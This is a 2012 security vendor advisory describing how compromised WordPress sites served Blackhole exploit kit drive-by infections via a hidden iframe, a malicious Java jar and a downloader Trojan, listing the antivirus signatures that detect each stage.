Compromised Wordpress sites use Black-Hole Exploit for Drive-by Infection

February 3, 2012

SonicWALL UTM research team has received reports of a new mass compromise of WordPress websites leading to drive-by malware download using the Black Hole Exploit kit. The malware spreads simply by visiting an infected page on a compromised WordPress based websever. The Blackhole exploit kit is known for targetting a list of known vulnerabilities on the target system and when successful it often downloads and runs a malicious executable. The exploits we observed here target Java based vulnerabilities. Depending on whether the system is patched or not, if exploit is successful it will lead to the download of a malicious executable without user consent.

The compromised sites contain the malicious Black Hole Exploit script as seen below:

[Detected as GAV: ScrInject.WP (Trojan)]

The script is dynamic and contains different content upon each visit to the infected site. During analysis, we found that the script contained a hidden iframe that leads to a Black Hole Exploited site that targets java based vulnerabilities and serves the file: df190f61.jar [Detected as GAV: JVExp.A (Trojan)]

The jar file is executed and causes downloader Trojan setup.exe to be downloaded and executed. [Detected as GAV: Downloader.EWP (Trojan)]

The downloader Trojan can download any malware the attacker chooses. We observed both Zeus Trojan and XP Internet Security 2012 FakeAV being served to the infected machine.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: ScrInject.WP (Trojan) current hit count: 5714
  • GAV: JVExp.A (Trojan)
  • GAV: Downloader.EWP (Trojan)